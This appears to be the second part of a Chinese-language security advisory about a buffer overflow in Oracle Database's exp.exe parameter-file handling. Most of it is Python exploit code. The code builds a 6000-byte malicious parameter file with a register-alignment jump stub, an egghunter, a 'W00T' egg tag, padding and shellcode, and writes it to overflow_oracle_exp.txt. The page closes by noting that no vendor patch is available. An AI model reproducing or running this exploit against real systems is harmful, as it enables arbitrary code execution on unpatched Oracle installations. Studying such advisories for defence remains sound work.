Oracle Database “exp.exe”参数文件远程缓冲区溢出漏(2)

# align edx
# MOV EDX,ESP
# SUB EDX,64
# SUB EDX,64
# SUB EDX,64
# SUB EDX,32
# SUB EDX,64           
# JMP EDX
align = ("\x8b\xd4\x83\xea\x64\x83\xea\x64\x83"
"\xea\x64\x83\xea\x32\x83\xea\x64\xff\xe2\x43");

exploit = header
exploit += "\x43" * 39
exploit += align
exploit += egghunter
exploit += "\x41" * (533-len(exploit))
exploit += "\xe9\x2a\xfe\xff\xff"
exploit += "\xbb\x8b\xe2\x61"
exploit += "\xeb\xf5"
exploit += "\x41" * 100
exploit += "\x57\x30\x30\x54" * 2
exploit += sc
exploit += "\x43" * (6000-len(exploit))
exploit += ".dmp"
banner()
print ("[+] Shellcode byte size: %s" % (len(sc)))
print ("[+] Writing %s bytes of exploit code to param file" % (len(exploit)))
pwnfile = open('overflow_oracle_exp.txt','w');
pwnfile.write(exploit);
pwnfile.close()
print "[+] Exploit overflow_oracle_exp.txt file created!"

建议：
--------------------------------------------------------------------------------
厂商补丁：

Oracle
------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：